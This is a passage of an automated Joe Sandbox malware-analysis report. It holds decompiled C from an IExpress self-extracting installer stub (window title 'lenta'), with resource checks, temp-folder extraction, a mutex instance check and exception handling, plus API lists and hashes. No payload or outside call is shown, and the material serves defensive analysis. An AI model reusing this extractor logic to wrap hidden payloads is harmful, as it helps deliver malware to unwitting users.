                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00977182
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00977191
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0097719A
                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 009771A3
                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 009771B8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1445889803-0
                                                                                                                                                                                                                                              • Opcode ID: 0ff82697e0d383c60fb4682d5c70b392708cb2c864c972fc5aac47a1e5d15353
                                                                                                                                                                                                                                              • Instruction ID: 8e17d44eca9d809715538ad342fe286bc4373d6db2affc7c1fdc1296e6f67c0c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ff82697e0d383c60fb4682d5c70b392708cb2c864c972fc5aac47a1e5d15353
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10111F72D29208DFDB10DFF8DA4869EB7F4FF48315F914465D409D7210DA309A44DB41
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00976CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                              				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                              			}



                                                                                                                                                                                                                                              0x00976cf7
                                                                                                                                                                                                                                              0x00976d00
                                                                                                                                                                                                                                              0x00976d19

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00976E26,00971000), ref: 00976CF7
                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(00976E26,?,00976E26,00971000), ref: 00976D00
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409,?,00976E26,00971000), ref: 00976D0B
                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,00976E26,00971000), ref: 00976D12
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3231755760-0
                                                                                                                                                                                                                                              • Opcode ID: 9a6a0daac3b18c4ce4dfccda53edf797f91a44764382f6560ab83356d44a05ad
                                                                                                                                                                                                                                              • Instruction ID: 5e6af2b92b5e75bc7558e33ccd16b6c0bf098305c059f199486ce4b8816babf2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a6a0daac3b18c4ce4dfccda53edf797f91a44764382f6560ab83356d44a05ad
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AD0C93301C108BBFB002BE1EC0CA5D3F28EBC8222F844000F31D82420CA324891EB56
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 76%
                                                                                                                                                                                                                                              			E00973210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                                                                              				int _t20;
                                                                                                                                                                                                                                              				int _t21;
                                                                                                                                                                                                                                              				int _t23;
                                                                                                                                                                                                                                              				char _t24;
                                                                                                                                                                                                                                              				long _t25;
                                                                                                                                                                                                                                              				int _t27;
                                                                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                                                                              				void* _t32;
                                                                                                                                                                                                                                              				int _t33;
                                                                                                                                                                                                                                              				int _t34;
                                                                                                                                                                                                                                              				int _t37;
                                                                                                                                                                                                                                              				int _t38;
                                                                                                                                                                                                                                              				int _t39;
                                                                                                                                                                                                                                              				void* _t42;
                                                                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                                                                              				CHAR* _t49;
                                                                                                                                                                                                                                              				void* _t58;
                                                                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                                                                              				struct HWND__* _t64;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t64 = _a4;
                                                                                                                                                                                                                                              				_t6 = _a8 - 0x10;
                                                                                                                                                                                                                                              				if(_t6 == 0) {
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					L38:
                                                                                                                                                                                                                                              					EndDialog(_t64, ??);
                                                                                                                                                                                                                                              					L39:
                                                                                                                                                                                                                                              					__eflags = 1;
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t42 = 1;
                                                                                                                                                                                                                                              				_t10 = _t6 - 0x100;
                                                                                                                                                                                                                                              				if(_t10 == 0) {
                                                                                                                                                                                                                                              					E009743D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                                                              					SetWindowTextA(_t64, "lenta");
                                                                                                                                                                                                                                              					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                                                              					__eflags =  *0x979a40 - _t42; // 0x3
                                                                                                                                                                                                                                              					if(__eflags == 0) {
                                                                                                                                                                                                                                              						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L36:
                                                                                                                                                                                                                                              					return _t42;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t10 == _t42) {
                                                                                                                                                                                                                                              					_t20 = _a12 - 1;
                                                                                                                                                                                                                                              					__eflags = _t20;
                                                                                                                                                                                                                                              					if(_t20 == 0) {
                                                                                                                                                                                                                                              						_t21 = GetDlgItemTextA(_t64, 0x835, 0x9791e4, 0x104);
                                                                                                                                                                                                                                              						__eflags = _t21;
                                                                                                                                                                                                                                              						if(_t21 == 0) {
                                                                                                                                                                                                                                              							L32:
                                                                                                                                                                                                                                              							_t58 = 0x4bf;
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              							_push(0x10);
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              							L25:
                                                                                                                                                                                                                                              							E009744B9(_t64, _t58);
                                                                                                                                                                                                                                              							goto L39;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t49 = 0x9791e4;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t23 =  *_t49;
                                                                                                                                                                                                                                              							_t49 =  &(_t49[1]);
                                                                                                                                                                                                                                              							__eflags = _t23;
                                                                                                                                                                                                                                              						} while (_t23 != 0);
                                                                                                                                                                                                                                              						__eflags = _t49 - 0x9791e5 - 3;
                                                                                                                                                                                                                                              						if(_t49 - 0x9791e5 < 3) {
                                                                                                                                                                                                                                              							goto L32;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t24 =  *0x9791e5; // 0x3a
                                                                                                                                                                                                                                              						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                                                              						if(_t24 == 0x3a) {
                                                                                                                                                                                                                                              							L21:
                                                                                                                                                                                                                                              							_t25 = GetFileAttributesA(0x9791e4);
                                                                                                                                                                                                                                              							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                                                              							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                              								L26:
                                                                                                                                                                                                                                              								E0097658A(0x9791e4, 0x104, 0x971140);
                                                                                                                                                                                                                                              								_t27 = E009758C8(0x9791e4);
                                                                                                                                                                                                                                              								__eflags = _t27;
                                                                                                                                                                                                                                              								if(_t27 != 0) {
                                                                                                                                                                                                                                              									__eflags =  *0x9791e4 - 0x5c;
                                                                                                                                                                                                                                              									if( *0x9791e4 != 0x5c) {
                                                                                                                                                                                                                                              										L30:
                                                                                                                                                                                                                                              										_t30 = E0097597D(0x9791e4, 1, _t64, 1);
                                                                                                                                                                                                                                              										__eflags = _t30;
                                                                                                                                                                                                                                              										if(_t30 == 0) {
                                                                                                                                                                                                                                              											L35:
                                                                                                                                                                                                                                              											_t42 = 1;
                                                                                                                                                                                                                                              											__eflags = 1;
                                                                                                                                                                                                                                              											goto L36;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										L31:
                                                                                                                                                                                                                                              										_t42 = 1;
                                                                                                                                                                                                                                              										EndDialog(_t64, 1);
                                                                                                                                                                                                                                              										goto L36;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									__eflags =  *0x9791e5 - 0x5c;
                                                                                                                                                                                                                                              									if( *0x9791e5 == 0x5c) {
                                                                                                                                                                                                                                              										goto L31;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									goto L30;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_push(0x10);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_t58 = 0x4be;
                                                                                                                                                                                                                                              								goto L25;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t32 = E009744B9(_t64, 0x54a, 0x9791e4, 0, 0x20, 4);
                                                                                                                                                                                                                                              							__eflags = _t32 - 6;
                                                                                                                                                                                                                                              							if(_t32 != 6) {
                                                                                                                                                                                                                                              								goto L35;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t33 = CreateDirectoryA(0x9791e4, 0);
                                                                                                                                                                                                                                              							__eflags = _t33;
                                                                                                                                                                                                                                              							if(_t33 != 0) {
                                                                                                                                                                                                                                              								goto L26;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_push(0);
							_push(0x10);
							_push(0);
							_push(0x9791e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x9791e4 - 0x5c;
						if( *0x9791e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x979124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x979a3c, 0x3e8, 0x978598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00974224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x9787a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E009744B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

























                                                                                                                                                                                                                                              0x00973354
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097335c
                                                                                                                                                                                                                                              0x00973362
                                                                                                                                                                                                                                              0x00973364
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973366
                                                                                                                                                                                                                                              0x00973367
                                                                                                                                                                                                                                              0x00973369
                                                                                                                                                                                                                                              0x0097336a
                                                                                                                                                                                                                                              0x0097336b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097336b
                                                                                                                                                                                                                                              0x0097331c
                                                                                                                                                                                                                                              0x00973323
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973329
                                                                                                                                                                                                                                              0x0097332b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097332b
                                                                                                                                                                                                                                              0x0097324c
                                                                                                                                                                                                                                              0x0097324c
                                                                                                                                                                                                                                              0x0097324f
                                                                                                                                                                                                                                              0x009732c8
                                                                                                                                                                                                                                              0x009732ce
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009732ce
                                                                                                                                                                                                                                              0x00973251
                                                                                                                                                                                                                                              0x00973256
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973271
                                                                                                                                                                                                                                              0x00973277
                                                                                                                                                                                                                                              0x00973279
                                                                                                                                                                                                                                              0x00973298
                                                                                                                                                                                                                                              0x0097329d
                                                                                                                                                                                                                                              0x0097329f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009732b0
                                                                                                                                                                                                                                              0x009732b6
                                                                                                                                                                                                                                              0x009732b8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009732be
                                                                                                                                                                                                                                              0x00973280
                                                                                                                                                                                                                                              0x00973289
                                                                                                                                                                                                                                              0x0097328e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097328e
                                                                                                                                                                                                                                              0x0097327b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097327b
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadStringA.USER32(000003E8,00978598,00000200), ref: 00973271
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 009733E2
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 009733F7
                                                                                                                                                                                                                                              • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00973410
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000836), ref: 00973426
                                                                                                                                                                                                                                              • EnableWindow.USER32(00000000), ref: 0097342D
                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 0097343F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$lenta
                                                                                                                                                                                                                                              • API String ID: 2418873061-2614117474
                                                                                                                                                                                                                                              • Opcode ID: db2181067ddef3cde265fa0ec5dbe40a764217701b1f5aeec2a0ea9472e366e5
                                                                                                                                                                                                                                              • Instruction ID: d2631222566477ab9042eacaa003156f7ff818e10298ec1b16b03c0292fb6c89
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db2181067ddef3cde265fa0ec5dbe40a764217701b1f5aeec2a0ea9472e366e5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A851253339824076FB351B355C8CF7F2A4CEBC6B55F90C428F64DA61E1DAA88A41B361
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E00972CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                                                              				struct HRSRC__* _t31;
                                                                                                                                                                                                                                              				intOrPtr _t33;
                                                                                                                                                                                                                                              				void* _t43;
                                                                                                                                                                                                                                              				void* _t48;
                                                                                                                                                                                                                                              				signed int _t65;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                              				signed int _t67;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t13 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                              				_t65 = 0;
                                                                                                                                                                                                                                              				_t66 = __ecx;
                                                                                                                                                                                                                                              				_t48 = __edx;
                                                                                                                                                                                                                                              				 *0x979a3c = __ecx;
                                                                                                                                                                                                                                              				memset(0x979140, 0, 0x8fc);
                                                                                                                                                                                                                                              				memset(0x978a20, 0, 0x32c);
                                                                                                                                                                                                                                              				memset(0x9788c0, 0, 0x104);
                                                                                                                                                                                                                                              				 *0x9793ec = 1;
                                                                                                                                                                                                                                              				_t20 = E0097468F("TITLE", 0x979154, 0x7f);
                                                                                                                                                                                                                                              				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                              					_t64 = 0x4b1;
                                                                                                                                                                                                                                              					goto L32;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                              					 *0x97858c = _t27;
                                                                                                                                                                                                                                              					SetEvent(_t27);
                                                                                                                                                                                                                                              					_t64 = 0x979a34;
                                                                                                                                                                                                                                              					if(E0097468F("EXTRACTOPT", 0x979a34, 4) != 0) {
                                                                                                                                                                                                                                              						if(( *0x979a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                              							L12:
                                                                                                                                                                                                                                              							 *0x979120 =  *0x979120 & _t65;
                                                                                                                                                                                                                                              							if(E00975C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                              								if( *0x978a3a == 0) {
                                                                                                                                                                                                                                              									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                              									if(_t31 != 0) {
                                                                                                                                                                                                                                              										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									if( *0x978184 != 0) {
                                                                                                                                                                                                                                              										__imp__#17();
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									if( *0x978a24 == 0) {
                                                                                                                                                                                                                                              										_t57 = _t65;
                                                                                                                                                                                                                                              										if(E009736EE(_t65) == 0) {
                                                                                                                                                                                                                                              											goto L33;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											_t33 =  *0x979a40; // 0x3
                                                                                                                                                                                                                                              											_t48 = 1;
                                                                                                                                                                                                                                              											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                              												if(( *0x979a34 & 0x00000100) == 0 || ( *0x978a38 & 0x00000001) != 0 || E009718A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                              													goto L30;
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													_t64 = 0x7d6;
                                                                                                                                                                                                                                              													if(E00976517(_t57, 0x7d6, _t34, E009719E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                              														goto L33;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														goto L30;
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												L30:
                                                                                                                                                                                                                                              												_t23 = _t48;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t23 = 1;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E00972390(0x978a3a);
                                                                                                                                                                                                                                              									goto L33;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t64 = 0x520;
                                                                                                                                                                                                                                              								L32:
                                                                                                                                                                                                                                              								E009744B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              								goto L33;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t64 =  &_v268;
                                                                                                                                                                                                                                              							if(E0097468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                              								goto L3;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                              								 *0x978588 = _t43;
                                                                                                                                                                                                                                              								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                              									goto L12;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									if(( *0x979a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                              										_t64 = 0x524;
                                                                                                                                                                                                                                              										if(E009744B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                              											goto L12;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											goto L11;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t64 = 0x54b;
                                                                                                                                                                                                                                              										E009744B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                                                                                                                                                                                              										L11:
                                                                                                                                                                                                                                              										CloseHandle( *0x978588);
                                                                                                                                                                                                                                              										 *0x979124 = 0x800700b7;
                                                                                                                                                                                                                                              										goto L33;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						L3:
                                                                                                                                                                                                                                              						_t64 = 0x4b1;
                                                                                                                                                                                                                                              						E009744B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						 *0x979124 = 0x80070714;
                                                                                                                                                                                                                                              						L33:
                                                                                                                                                                                                                                              						_t23 = 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                              			}



















                                                                                                                                                                                                                                              0x00972e8b
                                                                                                                                                                                                                                              0x00972e94
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972e96
                                                                                                                                                                                                                                              0x00972e96
                                                                                                                                                                                                                                              0x00972e9e
                                                                                                                                                                                                                                              0x00972ea2
                                                                                                                                                                                                                                              0x00972eba
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972ece
                                                                                                                                                                                                                                              0x00972ede
                                                                                                                                                                                                                                              0x00972eed
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972eed
                                                                                                                                                                                                                                              0x00972eef
                                                                                                                                                                                                                                              0x00972eef
                                                                                                                                                                                                                                              0x00972eef
                                                                                                                                                                                                                                              0x00972eef
                                                                                                                                                                                                                                              0x00972ea2
                                                                                                                                                                                                                                              0x00972e86
                                                                                                                                                                                                                                              0x00972e88
                                                                                                                                                                                                                                              0x00972e88
                                                                                                                                                                                                                                              0x00972e43
                                                                                                                                                                                                                                              0x00972e48
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972e48
                                                                                                                                                                                                                                              0x00972e30
                                                                                                                                                                                                                                              0x00972e30
                                                                                                                                                                                                                                              0x00972ef8
                                                                                                                                                                                                                                              0x00972f01
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972f01
                                                                                                                                                                                                                                              0x00972d8a
                                                                                                                                                                                                                                              0x00972d8f
                                                                                                                                                                                                                                              0x00972da1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972da3
                                                                                                                                                                                                                                              0x00972dae
                                                                                                                                                                                                                                              0x00972db4
                                                                                                                                                                                                                                              0x00972dbb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972dca
                                                                                                                                                                                                                                              0x00972dd3
                                                                                                                                                                                                                                              0x00972df5
                                                                                                                                                                                                                                              0x00972e02
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972dd5
                                                                                                                                                                                                                                              0x00972dde
                                                                                                                                                                                                                                              0x00972de3
                                                                                                                                                                                                                                              0x00972e04
                                                                                                                                                                                                                                              0x00972e0a
                                                                                                                                                                                                                                              0x00972e10
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972e10
                                                                                                                                                                                                                                              0x00972dd3
                                                                                                                                                                                                                                              0x00972dbb
                                                                                                                                                                                                                                              0x00972da1
                                                                                                                                                                                                                                              0x00972d5b
                                                                                                                                                                                                                                              0x00972d5b
                                                                                                                                                                                                                                              0x00972d5d
                                                                                                                                                                                                                                              0x00972d69
                                                                                                                                                                                                                                              0x00972d6e
                                                                                                                                                                                                                                              0x00972f06
                                                                                                                                                                                                                                              0x00972f06
                                                                                                                                                                                                                                              0x00972f06
                                                                                                                                                                                                                                              0x00972d59
                                                                                                                                                                                                                                              0x00972f18

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00972CD9
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00972CE9
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00972CF9
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746A0
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: SizeofResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746A9
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746C3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LoadResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746CC
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LockResource.KERNEL32(00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746D3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: memcpy_s.MSVCRT ref: 009746E5
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009746EF
                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00972D34
